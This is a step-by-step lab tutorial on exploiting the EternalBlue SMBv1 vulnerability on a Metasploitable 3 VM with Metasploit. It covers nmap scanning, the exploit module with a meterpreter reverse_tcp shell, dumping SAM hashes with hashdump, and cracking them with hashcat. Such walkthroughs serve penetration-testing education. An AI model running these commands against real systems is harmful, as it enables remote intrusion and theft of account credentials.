Exploiting Vulnerable SMB Services & Cracking Hashes with Hashcat

Mahran Al-Zyoud
|
25 steps

In 2017, threat actors launched one of the most well-known ransomware attacks on the internet that affected many Microsoft Windows systems around the world. This is known as the WannaCry ransomware. WannaCry took advantage of a security vulnerability on Windows operating systems that run SMB version 1. According to the Microsoft security bulletin MS17-010, this vulnerability affected systems ranging from Windows Vista to Windows Server 2016. Since it allowed threat actors to perform Remote Code Execution (RCE) on their targets, it was given the code name EternalBlue. While the EternalBlue vulnerability seems a bit dated at the time of writing, there are many Windows operating systems within\ organizations around the world that are still unpatched and vulnerable.

Firstly, power on both the Kali Linux and Metasploitable 3 (Windows-based) virtual machines. On Kali Linux, open Terminal and use the following command to determine whether the target is online: [[nmap -sn 172.17.2.0/24 --exclude 172.17.2.25]]

Next, use the following Nmap command to identify whether ports 136, 137, 138, 139, and 445 are open on the target: [[sudo nmap -sV -p 136-139,445 172.17.2.23]] As shown in the following screenshot, Nmap has identified that ports 139 and 445 are open on the targeted system. In addition, Nmap was able to identify the host operating system of the target:

Next, either on the same Terminal or another, use the following command to start the Metasploit framework on Kali Linux: [[msfconsole]]

Once the Metasploit framework has initiated, use the search command with the keyword ms17-010 to find relevant modules that are associated with the EternalBlue MS17-010 security bulletin: [[search ms17-010]] As shown in the following screenshot, Metasploit has a few auxiliary and exploitation modules to help us determine whether the target is truly vulnerable to EternalBlue.

Next, let’s use an auxiliary scanner to identify whether the target is vulnerable to EternalBlue before attempting exploitation on the SMB service. Use the following commands: [[use auxiliary/scanner/smb/smb_ms17_010]]\ [[set RHOST 172.17.2.23]]\ [[run]]

Next, let’s move on to the exploitation phase to gain a foothold on the targeted system. Use the following Metasploit command to use an exploit mode from our previous search results: Type back to exit the Metasploit module. [[back]] Next, let’s move on to the exploitation phase to gain a foothold on the targeted system. Use the following Metasploit command to use an exploit mode from our previous search results: [[use exploit/windows/smb/ms17_010_eternalblue]] Once you’ve selected the exploit/windows/smb/ms17_010_eternalblue exploit module, Metasploit automatically couples the windows/meterpreter/reverse_tcp payload module with the exploit. This means that once the exploit is delivered to the targeted system, it will execute within the target’s memory to take advantage of the SMBv1 vulnerable service. Once the exploit is successful, Metasploit will then send the payload across to the target, which will be executed within memory and create a reverse shell back to Kali Linux, therefore enabling us to perform RCE and post-exploitation operations. Next, use the following commands to set RHOSTS (targeted system) and LHOST (Kali Linux) and launch the attack: [[set payload windows/x64/meterpreter/reverse_tcp]] [[set RHOSTS 172.17.2.23]] [[set LHOST 172.17.2.25]] [[exploit]] Once the exploit and payload have been executed successfully on the target, you will automatically obtain a Meterpreter shell on Kali Linux. You can use the [[help ]]command within Meterpreter to view all the actions you can perform. By using Meterpreter, you can remotely execute commands on the target system from your Kali Linux machine on the compromised system. If the exploit fails on the first run, execute the exploit command again to retry it. Sometimes, the exploit can even crash the target. Since the target is within our lab environment, if it crashes, reboot the machine and try again.

Tip! When working within a module in Metasploit, use the [[options ]]command to check\ whether you need to set various parameters for a module, such as RHOSTS (target) and LHOST (attacker machine).

Next, the following screenshot shows Metasploit sending the exploit to the target:

Finally, Metasploit delivered the payload, and a reverse shell was established from the target to Kali Linux. As shown below, we’ve gotten a Meterpreter shell (reverse shell) from the target.

Next, use the hashdump command within Meterpreter to extract the contents of the Security Account Manager (SAM) file. The SAM file is found within Microsoft Windows operating systems in the **%SystemRoot%/system32/config/SAM** directory and contains a record of all local user accounts, their Security Identifier (SID) values, and password hashes. As shown below, you can identify the usernames as they are plaintext,\ the LAN Manager (LM), and New Technology LAN Manager (NTLM) password hashes for each local user account. The SAM file stores each user’s credentials in the following format: **Username : Security Identifier (SID) : LM hash : NTLM hash**

Next, save the output from the hashdump command (SAM file) in a text file called passwordhashes.txt in the home directory. This will be used for performing offline password cracking to identify the plaintext passwords of users later.

Additionally, save the user Administrator with its LM and NTLM hashes into another text file, name it **admin_user.txt**, and use the following format: Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c\ 245d35b50b

Copy the hash of the Administrator.

Next, to identify a hash type, use the [[hashid ]]*<hash value>* command on Kali Linux

As shown in the following screenshot, hashID was able to match the hash with a few hash types, including NTLM. Identifying hashes can be useful in performing password-cracking techniques.

Tip! Keep in mind that Microsoft Windows operating systems do not store local users’ passwords in plaintext. Instead, they parse the plaintext password through a hashing algorithm such as NTLM, which performs a one-way function of converting the plaintext password into a cryptographic NTLM digest (hash). This process is non-reversible. The NTLM hash of each local user account is stored within the SAM file. \ Windows systems have moved toward more secure methods of password storage, such as using the NT hash or Kerberos, especially in newer versions of Windows. These methods are more resistant to certain types of attacks compared to older NTLM hashes.

**Cracking hashes with Hashcat** Hashcat is a super awesome advanced password recovery application that enables penetration testers to perform offline password-based attacks. Hashcat uses techniques such as dictionary attacks, brute-force attacks, and mask attacks for cracking hashed passwords. Many password-cracking tools\ often leverage the processor of a computer, and Hashcat leverages the computing power of the Central Processing Unit (CPU) and Graphics Processing Unit (GPU). However, when using Hashcat, it’s always recommended to use the GPU rather than the CPU to gain better performance during the password-cracking process. \ For Hashcat to efficiently take advantage of the computing power on the GPU of a system, it needs direct access to the hardware component. Hashcat relies on low-level hardware interactions to achieve maximum performance, but in virtualized or cloud environments, access to hardware resources is often\ restricted, which limits Hashcat’s effectiveness. This means that if you’re attempting to use Hashcat within a virtualized or cloud environment, there’s a high possibility it will not work as expected or you won’t have high performance. Therefore, it’s recommended to install Hashcat on your host operating\ system, which has direct access to your dedicated GPU/graphics card.

On Kali Linux, open Terminal and use the following command to determine the code for the attack mode and hash type for Hashcat: [[man hashcat]]

Next, use the following commands to perform offline password-cracking on the hashes within the passwordhashes.txt file: [[hashcat -m 1000 /home/kali/passwordhashes.txt -a 0 /usr/share/wordlists/rockyou.txt]] The **–m 1000** syntax enables us to specify the hash type as NTLM and **–a 0** specifies the attack type for using a wordlist (dictionary-based).

The following screenshot shows that Hashcat was able to retrieve some passwords from the hashes:

Once the Hashcat process is completed, you can append the [[--show]] syntax at the end of the previous command to show the results. As shown below, the first NTLM hash belongs to the administrator user on\ the targeted system. This means the plaintext password can be leveraged to gain unauthorized access to the target while pretending to be someone else, such as the administrator.

Copy the hash of the Administrator.

Additionally, you can perform password cracking on a single hash at a time by placing the NTLM hash within quotation marks.